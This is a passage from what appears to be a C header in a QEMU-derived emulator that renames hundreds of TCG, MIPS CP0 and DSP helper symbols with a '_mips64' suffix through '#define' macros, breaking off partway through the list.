#define cpu_ldl_code cpu_ldl_code_mips64 #define cpu_ldq_code cpu_ldq_code_mips64 #define helper_div_i32 helper_div_i32_mips64 #define helper_rem_i32 helper_rem_i32_mips64 #define helper_divu_i32 helper_divu_i32_mips64 #define helper_remu_i32 helper_remu_i32_mips64 #define helper_shl_i64 helper_shl_i64_mips64 #define helper_shr_i64 helper_shr_i64_mips64 #define helper_sar_i64 helper_sar_i64_mips64 #define helper_div_i64 helper_div_i64_mips64 #define helper_rem_i64 helper_rem_i64_mips64 #define helper_divu_i64 helper_divu_i64_mips64 #define helper_remu_i64 helper_remu_i64_mips64 #define helper_muluh_i64 helper_muluh_i64_mips64 #define helper_mulsh_i64 helper_mulsh_i64_mips64 #define helper_clz_i32 helper_clz_i32_mips64 #define helper_ctz_i32 helper_ctz_i32_mips64 #define helper_clz_i64 helper_clz_i64_mips64 #define helper_ctz_i64 helper_ctz_i64_mips64 #define helper_clrsb_i32 helper_clrsb_i32_mips64 #define helper_clrsb_i64 helper_clrsb_i64_mips64 #define helper_ctpop_i32 helper_ctpop_i32_mips64 #define helper_ctpop_i64 helper_ctpop_i64_mips64 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_mips64 #define helper_exit_atomic helper_exit_atomic_mips64 #define helper_gvec_add8 helper_gvec_add8_mips64 #define helper_gvec_add16 helper_gvec_add16_mips64 #define helper_gvec_add32 helper_gvec_add32_mips64 #define helper_gvec_add64 helper_gvec_add64_mips64 #define helper_gvec_adds8 helper_gvec_adds8_mips64 #define helper_gvec_adds16 helper_gvec_adds16_mips64 #define helper_gvec_adds32 helper_gvec_adds32_mips64 #define helper_gvec_adds64 helper_gvec_adds64_mips64 #define helper_gvec_sub8 helper_gvec_sub8_mips64 #define helper_gvec_sub16 helper_gvec_sub16_mips64 #define helper_gvec_sub32 helper_gvec_sub32_mips64 #define helper_gvec_sub64 helper_gvec_sub64_mips64 #define helper_gvec_subs8 helper_gvec_subs8_mips64 #define helper_gvec_subs16 helper_gvec_subs16_mips64 #define helper_gvec_subs32 helper_gvec_subs32_mips64 #define helper_gvec_subs64 helper_gvec_subs64_mips64 #define helper_gvec_mul8 helper_gvec_mul8_mips64 #define helper_gvec_mul16 helper_gvec_mul16_mips64 #define helper_gvec_mul32 helper_gvec_mul32_mips64 #define helper_gvec_mul64 helper_gvec_mul64_mips64 #define helper_gvec_muls8 helper_gvec_muls8_mips64 #define helper_gvec_muls16 helper_gvec_muls16_mips64 #define helper_gvec_muls32 helper_gvec_muls32_mips64 #define helper_gvec_muls64 helper_gvec_muls64_mips64 #define helper_gvec_neg8 helper_gvec_neg8_mips64 #define helper_gvec_neg16 helper_gvec_neg16_mips64 #define helper_gvec_neg32 helper_gvec_neg32_mips64 #define helper_gvec_neg64 helper_gvec_neg64_mips64 #define helper_gvec_abs8 helper_gvec_abs8_mips64 #define helper_gvec_abs16 helper_gvec_abs16_mips64 #define helper_gvec_abs32 helper_gvec_abs32_mips64 #define helper_gvec_abs64 helper_gvec_abs64_mips64 #define helper_gvec_mov helper_gvec_mov_mips64 #define helper_gvec_dup64 helper_gvec_dup64_mips64 #define helper_gvec_dup32 helper_gvec_dup32_mips64 #define helper_gvec_dup16 helper_gvec_dup16_mips64 #define helper_gvec_dup8 helper_gvec_dup8_mips64 #define helper_gvec_not helper_gvec_not_mips64 #define helper_gvec_and helper_gvec_and_mips64 #define helper_gvec_or helper_gvec_or_mips64 #define helper_gvec_xor helper_gvec_xor_mips64 #define helper_gvec_andc helper_gvec_andc_mips64 #define helper_gvec_orc helper_gvec_orc_mips64 #define helper_gvec_nand helper_gvec_nand_mips64 #define helper_gvec_nor helper_gvec_nor_mips64 #define helper_gvec_eqv helper_gvec_eqv_mips64 #define helper_gvec_ands helper_gvec_ands_mips64 #define helper_gvec_xors helper_gvec_xors_mips64 #define helper_gvec_ors helper_gvec_ors_mips64 #define helper_gvec_shl8i helper_gvec_shl8i_mips64 #define helper_gvec_shl16i helper_gvec_shl16i_mips64 #define helper_gvec_shl32i helper_gvec_shl32i_mips64 #define helper_gvec_shl64i helper_gvec_shl64i_mips64 #define helper_gvec_shr8i helper_gvec_shr8i_mips64 #define helper_gvec_shr16i helper_gvec_shr16i_mips64 #define helper_gvec_shr32i helper_gvec_shr32i_mips64 #define helper_gvec_shr64i helper_gvec_shr64i_mips64 #define helper_gvec_sar8i helper_gvec_sar8i_mips64 #define helper_gvec_sar16i helper_gvec_sar16i_mips64 #define helper_gvec_sar32i helper_gvec_sar32i_mips64 #define helper_gvec_sar64i helper_gvec_sar64i_mips64 #define helper_gvec_shl8v helper_gvec_shl8v_mips64 #define helper_gvec_shl16v helper_gvec_shl16v_mips64 #define helper_gvec_shl32v helper_gvec_shl32v_mips64 #define helper_gvec_shl64v helper_gvec_shl64v_mips64 #define helper_gvec_shr8v helper_gvec_shr8v_mips64 #define helper_gvec_shr16v helper_gvec_shr16v_mips64 #define helper_gvec_shr32v helper_gvec_shr32v_mips64 #define helper_gvec_shr64v helper_gvec_shr64v_mips64 #define helper_gvec_sar8v helper_gvec_sar8v_mips64 #define helper_gvec_sar16v helper_gvec_sar16v_mips64 #define helper_gvec_sar32v helper_gvec_sar32v_mips64 #define helper_gvec_sar64v helper_gvec_sar64v_mips64 #define helper_gvec_eq8 helper_gvec_eq8_mips64 #define helper_gvec_ne8 helper_gvec_ne8_mips64 #define helper_gvec_lt8 helper_gvec_lt8_mips64 #define helper_gvec_le8 helper_gvec_le8_mips64 #define helper_gvec_ltu8 helper_gvec_ltu8_mips64 #define helper_gvec_leu8 helper_gvec_leu8_mips64 #define helper_gvec_eq16 helper_gvec_eq16_mips64 #define helper_gvec_ne16 helper_gvec_ne16_mips64 #define helper_gvec_lt16 helper_gvec_lt16_mips64 #define helper_gvec_le16 helper_gvec_le16_mips64 #define helper_gvec_ltu16 helper_gvec_ltu16_mips64 #define helper_gvec_leu16 helper_gvec_leu16_mips64 #define helper_gvec_eq32 helper_gvec_eq32_mips64 #define helper_gvec_ne32 helper_gvec_ne32_mips64 #define helper_gvec_lt32 helper_gvec_lt32_mips64 #define helper_gvec_le32 helper_gvec_le32_mips64 #define helper_gvec_ltu32 helper_gvec_ltu32_mips64 #define helper_gvec_leu32 helper_gvec_leu32_mips64 #define helper_gvec_eq64 helper_gvec_eq64_mips64 #define helper_gvec_ne64 helper_gvec_ne64_mips64 #define helper_gvec_lt64 helper_gvec_lt64_mips64 #define helper_gvec_le64 helper_gvec_le64_mips64 #define helper_gvec_ltu64 helper_gvec_ltu64_mips64 #define helper_gvec_leu64 helper_gvec_leu64_mips64 #define helper_gvec_ssadd8 helper_gvec_ssadd8_mips64 #define helper_gvec_ssadd16 helper_gvec_ssadd16_mips64 #define helper_gvec_ssadd32 helper_gvec_ssadd32_mips64 #define helper_gvec_ssadd64 helper_gvec_ssadd64_mips64 #define helper_gvec_sssub8 helper_gvec_sssub8_mips64 #define helper_gvec_sssub16 helper_gvec_sssub16_mips64 #define helper_gvec_sssub32 helper_gvec_sssub32_mips64 #define helper_gvec_sssub64 helper_gvec_sssub64_mips64 #define helper_gvec_usadd8 helper_gvec_usadd8_mips64 #define helper_gvec_usadd16 helper_gvec_usadd16_mips64 #define helper_gvec_usadd32 helper_gvec_usadd32_mips64 #define helper_gvec_usadd64 helper_gvec_usadd64_mips64 #define helper_gvec_ussub8 helper_gvec_ussub8_mips64 #define helper_gvec_ussub16 helper_gvec_ussub16_mips64 #define helper_gvec_ussub32 helper_gvec_ussub32_mips64 #define helper_gvec_ussub64 helper_gvec_ussub64_mips64 #define helper_gvec_smin8 helper_gvec_smin8_mips64 #define helper_gvec_smin16 helper_gvec_smin16_mips64 #define helper_gvec_smin32 helper_gvec_smin32_mips64 #define helper_gvec_smin64 helper_gvec_smin64_mips64 #define helper_gvec_smax8 helper_gvec_smax8_mips64 #define helper_gvec_smax16 helper_gvec_smax16_mips64 #define helper_gvec_smax32 helper_gvec_smax32_mips64 #define helper_gvec_smax64 helper_gvec_smax64_mips64 #define helper_gvec_umin8 helper_gvec_umin8_mips64 #define helper_gvec_umin16 helper_gvec_umin16_mips64 #define helper_gvec_umin32 helper_gvec_umin32_mips64 #define helper_gvec_umin64 helper_gvec_umin64_mips64 #define helper_gvec_umax8 helper_gvec_umax8_mips64 #define helper_gvec_umax16 helper_gvec_umax16_mips64 #define helper_gvec_umax32 helper_gvec_umax32_mips64 #define helper_gvec_umax64 helper_gvec_umax64_mips64 #define helper_gvec_bitsel helper_gvec_bitsel_mips64 #define cpu_restore_state cpu_restore_state_mips64 #define page_collection_lock page_collection_lock_mips64 #define page_collection_unlock page_collection_unlock_mips64 #define free_code_gen_buffer free_code_gen_buffer_mips64 #define tcg_exec_init tcg_exec_init_mips64 #define tb_cleanup tb_cleanup_mips64 #define tb_flush tb_flush_mips64 #define tb_phys_invalidate tb_phys_invalidate_mips64 #define tb_gen_code tb_gen_code_mips64 #define tb_exec_lock tb_exec_lock_mips64 #define tb_exec_unlock tb_exec_unlock_mips64 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mips64 #define tb_invalidate_phys_range tb_invalidate_phys_range_mips64 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips64 #define tb_check_watchpoint tb_check_watchpoint_mips64 #define cpu_io_recompile cpu_io_recompile_mips64 #define tb_flush_jmp_cache tb_flush_jmp_cache_mips64 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_mips64 #define translator_loop_temp_check translator_loop_temp_check_mips64 #define translator_loop translator_loop_mips64 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_mips64 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_mips64 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_mips64 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_mips64 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_mips64 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_mips64 #define unassigned_mem_ops unassigned_mem_ops_mips64 #define floatx80_infinity floatx80_infinity_mips64 #define dup_const_func dup_const_func_mips64 #define gen_helper_raise_exception gen_helper_raise_exception_mips64 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_mips64 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips64 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips64 #define gen_helper_cpsr_read gen_helper_cpsr_read_mips64 #define gen_helper_cpsr_write gen_helper_cpsr_write_mips64 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_mips64 #define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips64 #define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips64 #define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips64 #define helper_mfc0_random helper_mfc0_random_mips64 #define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips64 #define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips64 #define helper_mfc0_tcbind helper_mfc0_tcbind_mips64 #define helper_mftc0_tcbind helper_mftc0_tcbind_mips64 #define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips64 #define helper_mftc0_tcrestart helper_mftc0_tcrestart_mips64 #define helper_mfc0_tchalt helper_mfc0_tchalt_mips64 #define helper_mftc0_tchalt helper_mftc0_tchalt_mips64 #define helper_mfc0_tccontext helper_mfc0_tccontext_mips64 #define helper_mftc0_tccontext helper_mftc0_tccontext_mips64 #define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips64 #define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips64 #define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips64 #define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips64 #define helper_mfc0_count helper_mfc0_count_mips64 #define helper_mfc0_saar helper_mfc0_saar_mips64 #define helper_mfhc0_saar helper_mfhc0_saar_mips64 #define helper_mftc0_entryhi helper_mftc0_entryhi_mips64 #define helper_mftc0_cause helper_mftc0_cause_mips64 #define helper_mftc0_status helper_mftc0_status_mips64 #define helper_mfc0_lladdr helper_mfc0_lladdr_mips64 #define helper_mfc0_maar helper_mfc0_maar_mips64 #define helper_mfhc0_maar helper_mfhc0_maar_mips64 #define helper_mfc0_watchlo helper_mfc0_watchlo_mips64 #define helper_mfc0_watchhi helper_mfc0_watchhi_mips64 #define helper_mfhc0_watchhi helper_mfhc0_watchhi_mips64 #define helper_mfc0_debug helper_mfc0_debug_mips64 #define helper_mftc0_debug helper_mftc0_debug_mips64 #define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips64 #define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips64 #define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips64 #define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips64 #define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips64 #define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips64 #define helper_dmfc0_maar helper_dmfc0_maar_mips64 #define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips64 #define helper_dmfc0_watchhi helper_dmfc0_watchhi_mips64 #define helper_dmfc0_saar helper_dmfc0_saar_mips64 #define helper_mtc0_index helper_mtc0_index_mips64 #define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips64 #define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips64 #define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips64 #define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips64 #define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips64 #define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips64 #define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips64 #define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips64 #define helper_mtc0_yqmask helper_mtc0_yqmask_mips64 #define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips64 #define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips64 #define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips64 #define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips64 #define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips64 #define helper_mtc0_tcbind helper_mtc0_tcbind_mips64 #define helper_mttc0_tcbind helper_mttc0_tcbind_mips64 #define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips64 #define helper_mttc0_tcrestart helper_mttc0_tcrestart_mips64 #define helper_mtc0_tchalt helper_mtc0_tchalt_mips64 #define helper_mttc0_tchalt helper_mttc0_tchalt_mips64 #define helper_mtc0_tccontext helper_mtc0_tccontext_mips64 #define helper_mttc0_tccontext helper_mttc0_tccontext_mips64 #define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips64 #define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips64 #define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips64 #define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips64 #define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips64 #define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips64 #define helper_mtc0_context helper_mtc0_context_mips64 #define helper_mtc0_memorymapid helper_mtc0_memorymapid_mips64 #define update_pagemask update_pagemask_mips64 #define helper_mtc0_pagemask helper_mtc0_pagemask_mips64 #define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips64 #define helper_mtc0_segctl0 helper_mtc0_segctl0_mips64 #define helper_mtc0_segctl1 helper_mtc0_segctl1_mips64 #define helper_mtc0_segctl2 helper_mtc0_segctl2_mips64 #define helper_mtc0_pwfield helper_mtc0_pwfield_mips64 #define helper_mtc0_pwsize helper_mtc0_pwsize_mips64 #define helper_mtc0_wired helper_mtc0_wired_mips64 #define helper_mtc0_pwctl helper_mtc0_pwctl_mips64 #define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips64 #define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips64 #define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips64 #define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips64 #define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips64 #define helper_mtc0_hwrena helper_mtc0_hwrena_mips64 #define helper_mtc0_count helper_mtc0_count_mips64 #define helper_mtc0_saari helper_mtc0_saari_mips64 #define helper_mtc0_saar helper_mtc0_saar_mips64 #define helper_mthc0_saar helper_mthc0_saar_mips64 #define helper_mtc0_entryhi helper_mtc0_entryhi_mips64 #define helper_mttc0_entryhi helper_mttc0_entryhi_mips64 #define helper_mtc0_compare helper_mtc0_compare_mips64 #define helper_mtc0_status helper_mtc0_status_mips64 #define helper_mttc0_status helper_mttc0_status_mips64 #define helper_mtc0_intctl helper_mtc0_intctl_mips64 #define helper_mtc0_srsctl helper_mtc0_srsctl_mips64 #define helper_mtc0_cause helper_mtc0_cause_mips64 #define helper_mttc0_cause helper_mttc0_cause_mips64 #define helper_mftc0_epc helper_mftc0_epc_mips64 #define helper_mftc0_ebase helper_mftc0_ebase_mips64 #define helper_mtc0_ebase helper_mtc0_ebase_mips64 #define helper_mttc0_ebase helper_mttc0_ebase_mips64 #define helper_mftc0_configx helper_mftc0_configx_mips64 #define helper_mtc0_config0 helper_mtc0_config0_mips64 #define helper_mtc0_config2 helper_mtc0_config2_mips64 #define helper_mtc0_config3 helper_mtc0_config3_mips64 #define helper_mtc0_config4 helper_mtc0_config4_mips64 #define helper_mtc0_config5 helper_mtc0_config5_mips64 #define helper_mtc0_lladdr helper_mtc0_lladdr_mips64 #define helper_mtc0_maar helper_mtc0_maar_mips64 #define helper_mthc0_maar helper_mthc0_maar_mips64 #define helper_mtc0_maari helper_mtc0_maari_mips64 #define helper_mtc0_watchlo helper_mtc0_watchlo_mips64 #define helper_mtc0_watchhi helper_mtc0_watchhi_mips64 #define helper_mthc0_watchhi helper_mthc0_watchhi_mips64 #define helper_mtc0_xcontext helper_mtc0_xcontext_mips64 #define helper_mtc0_framemask helper_mtc0_framemask_mips64 #define helper_mtc0_debug helper_mtc0_debug_mips64 #define helper_mttc0_debug helper_mttc0_debug_mips64 #define helper_mtc0_performance0 helper_mtc0_performance0_mips64 #define helper_mtc0_errctl helper_mtc0_errctl_mips64 #define helper_mtc0_taglo helper_mtc0_taglo_mips64 #define helper_mtc0_datalo helper_mtc0_datalo_mips64 #define helper_mtc0_taghi helper_mtc0_taghi_mips64 #define helper_mtc0_datahi helper_mtc0_datahi_mips64 #define helper_mftgpr helper_mftgpr_mips64 #define helper_mftlo helper_mftlo_mips64 #define helper_mfthi helper_mfthi_mips64 #define helper_mftacx helper_mftacx_mips64 #define helper_mftdsp helper_mftdsp_mips64 #define helper_mttgpr helper_mttgpr_mips64 #define helper_mttlo helper_mttlo_mips64 #define helper_mtthi helper_mtthi_mips64 #define helper_mttacx helper_mttacx_mips64 #define helper_mttdsp helper_mttdsp_mips64 #define helper_dmt helper_dmt_mips64 #define helper_emt helper_emt_mips64 #define helper_dvpe helper_dvpe_mips64 #define helper_evpe helper_evpe_mips64 #define helper_dvp helper_dvp_mips64 #define helper_evp helper_evp_mips64 #define cpu_mips_get_random cpu_mips_get_random_mips64 #define cpu_mips_init cpu_mips_init_mips64 #define helper_absq_s_ph helper_absq_s_ph_mips64 #define helper_absq_s_qb helper_absq_s_qb_mips64 #define helper_absq_s_w helper_absq_s_w_mips64 #define helper_absq_s_ob helper_absq_s_ob_mips64 #define helper_absq_s_qh helper_absq_s_qh_mips64 #define helper_absq_s_pw helper_absq_s_pw_mips64 #define helper_addqh_ph helper_addqh_ph_mips64 #define helper_addqh_r_ph helper_addqh_r_ph_mips64 #define helper_addqh_r_w helper_addqh_r_w_mips64 #define helper_addqh_w helper_addqh_w_mips64 #define helper_adduh_qb helper_adduh_qb_mips64 #define helper_adduh_r_qb helper_adduh_r_qb_mips64 #define helper_subqh_ph helper_subqh_ph_mips64 #define helper_subqh_r_ph helper_subqh_r_ph_mips64 #define helper_subqh_r_w helper_subqh_r_w_mips64 #define helper_subqh_w helper_subqh_w_mips64 #define helper_addq_ph helper_addq_ph_mips64 #define helper_addq_s_ph helper_addq_s_ph_mips64 #define helper_addq_s_w helper_addq_s_w_mips64 #define helper_addu_ph helper_addu_ph_mips64 #define helper_addu_qb helper_addu_qb_mips64 #define helper_addu_s_ph helper_addu_s_ph_mips64 #define helper_addu_s_qb helper_addu_s_qb_mips64 #define helper_subq_ph helper_subq_ph_mips64 #define helper_subq_s_ph helper_subq_s_ph_mips64 #define helper_subq_s_w helper_subq_s_w_mips64 #define helper_subu_ph helper_subu_ph_mips64 #define helper_subu_qb helper_subu_qb_mips64 #define helper_subu_s_ph helper_subu_s_ph_mips64 #define helper_subu_s_qb helper_subu_s_qb_mips64 #define helper_adduh_ob helper_adduh_ob_mips64 #define helper_adduh_r_ob helper_adduh_r_ob_mips64 #define helper_subuh_ob helper_subuh_ob_mips64 #define helper_subuh_r_ob helper_subuh_r_ob_mips64 #define helper_addq_pw helper_addq_pw_mips64 #define helper_addq_qh helper_addq_qh_mips64 #define helper_addq_s_pw helper_addq_s_pw_mips64 #define helper_addq_s_qh helper_addq_s_qh_mips64 #define helper_addu_ob helper_addu_ob_mips64 #define helper_addu_qh helper_addu_qh_mips64 #define helper_addu_s_ob helper_addu_s_ob_mips64 #define helper_addu_s_qh helper_addu_s_qh_mips64 #define helper_subq_pw helper_subq_pw_mips64 #define helper_subq_qh helper_subq_qh_mips64 #define helper_subq_s_pw helper_subq_s_pw_mips64 #define helper_subq_s_qh helper_subq_s_qh_mips64 #define helper_subu_ob helper_subu_ob_mips64 #define helper_subu_qh helper_subu_qh_mips64 #define helper_subu_s_ob helper_subu_s_ob_mips64 #define helper_subu_s_qh helper_subu_s_qh_mips64 #define helper_subuh_qb helper_subuh_qb_mips64 #define helper_subuh_r_qb helper_subuh_r_qb_mips64 #define helper_addsc helper_addsc_mips64 #define helper_addwc helper_addwc_mips64 #define helper_modsub helper_modsub_mips64 #define helper_raddu_w_qb helper_raddu_w_qb_mips64 #define helper_raddu_l_ob helper_raddu_l_ob_mips64 #define helper_precr_qb_ph helper_precr_qb_ph_mips64 #define helper_precrq_qb_ph helper_precrq_qb_ph_mips64 #define helper_precr_sra_ph_w helper_precr_sra_ph_w_mips64 #define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips64 #define helper_precrq_ph_w helper_precrq_ph_w_mips64 #define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips64 #define helper_precr_ob_qh helper_precr_ob_qh_mips64 #define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips64 #define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips64 #define helper_precrq_ob_qh helper_precrq_ob_qh_mips64 #define helper_precrq_qh_pw helper_precrq_qh_pw_mips64 #define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips64 #define helper_precrq_pw_l helper_precrq_pw_l_mips64 #define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips64 #define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips64 #define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips64 #define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips64 #define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips64 #define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips64 #define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips64 #define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips64 #define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips64 #define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips64 #define helper_precequ_qh_obl helper_precequ_qh_obl_mips64 #define helper_precequ_qh_obr helper_precequ_qh_obr_mips64 #define helper_precequ_qh_obla helper_precequ_qh_obla_mips64 #define helper_precequ_qh_obra helper_precequ_qh_obra_mips64 #define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips64 #define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips64 #define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips64 #define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips64 #define helper_preceu_qh_obl helper_preceu_qh_obl_mips64 #define helper_preceu_qh_obr helper_preceu_qh_obr_mips64 #define helper_preceu_qh_obla helper_preceu_qh_obla_mips64 #define helper_preceu_qh_obra helper_preceu_qh_obra_mips64 #define helper_shll_qb helper_shll_qb_mips64 #define helper_shrl_qb helper_shrl_qb_mips64 #define helper_shra_qb helper_shra_qb_mips64 #define helper_shra_r_qb helper_shra_r_qb_mips64 #define helper_shll_ob helper_shll_ob_mips64 #define helper_shrl_ob helper_shrl_ob_mips64 #define helper_shra_ob helper_shra_ob_mips64 #define helper_shra_r_ob helper_shra_r_ob_mips64 #define helper_shll_ph helper_shll_ph_mips64 #define helper_shll_s_ph helper_shll_s_ph_mips64 #define helper_shll_qh helper_shll_qh_mips64 #define helper_shll_s_qh helper_shll_s_qh_mips64 #define helper_shrl_qh helper_shrl_qh_mips64 #define helper_shra_qh helper_shra_qh_mips64 #define helper_shra_r_qh helper_shra_r_qh_mips64 #define helper_shll_s_w helper_shll_s_w_mips64 #define helper_shra_r_w helper_shra_r_w_mips64 #define helper_shll_pw helper_shll_pw_mips64 #define helper_shll_s_pw helper_shll_s_pw_mips64 #define helper_shra_pw helper_shra_pw_mips64 #define helper_shra_r_pw helper_shra_r_pw_mips64 #define helper_shrl_ph helper_shrl_ph_mips64 #define helper_shra_ph helper_shra_ph_mips64 #define helper_shra_r_ph helper_shra_r_ph_mips64 #define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips64 #define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips64 #define helper_mulq_rs_ph helper_mulq_rs_ph_mips64 #define helper_mul_ph helper_mul_ph_mips64 #define helper_mul_s_ph helper_mul_s_ph_mips64 #define helper_mulq_s_ph helper_mulq_s_ph_mips64 #define helper_muleq_s_w_phl helper_muleq_s_w_phl_mips64 #define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips64 #define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips64 #define helper_mulsa_w_ph helper_mulsa_w_ph_mips64 #define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips64 #define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips64 #define helper_mulq_rs_qh helper_mulq_rs_qh_mips64 #define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips64 #define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips64 #define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips64 #define helper_dpau_h_qbl helper_dpau_h_qbl_mips64 #define helper_dpau_h_qbr helper_dpau_h_qbr_mips64 #define helper_dpsu_h_qbl helper_dpsu_h_qbl_mips64 #define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips64 #define helper_dpau_h_obl helper_dpau_h_obl_mips64 #define helper_dpau_h_obr helper_dpau_h_obr_mips64 #define helper_dpsu_h_obl helper_dpsu_h_obl_mips64 #define helper_dpsu_h_obr helper_dpsu_h_obr_mips64 #define helper_dpa_w_ph helper_dpa_w_ph_mips64 #define helper_dpax_w_ph helper_dpax_w_ph_mips64 #define helper_dps_w_ph helper_dps_w_ph_mips64 #define helper_dpsx_w_ph helper_dpsx_w_ph_mips64 #define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips64 #define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips64 #define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips64 #define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips64 #define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips64 #define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips64 #define helper_dpa_w_qh helper_dpa_w_qh_mips64 #define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips64 #define helper_dps_w_qh helper_dps_w_qh_mips64 #define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips64 #define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips64 #define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips64 #define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips64 #define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mips64 #define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips64 #define helper_maq_s_w_phl helper_maq_s_w_phl_mips64 #define helper_maq_s_w_phr helper_maq_s_w_phr_mips64 #define helper_maq_sa_w_phl helper_maq_sa_w_phl_mips64 #define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips64 #define helper_mulq_s_w helper_mulq_s_w_mips64 #define helper_mulq_rs_w helper_mulq_rs_w_mips64 #define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips64 #define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips64 #define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips64 #define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips64 #define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips64 #define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mips64 #define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mips64 #define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips64 #define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips64 #define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips64 #define helper_dmadd helper_dmadd_mips64 #define helper_dmaddu helper_dmaddu_mips64 #define helper_dmsub helper_dmsub_mips64 #define helper_dmsubu helper_dmsubu_mips64 #define helper_bitrev helper_bitrev_mips64 #define helper_insv helper_insv_mips64 #define helper_dinsv 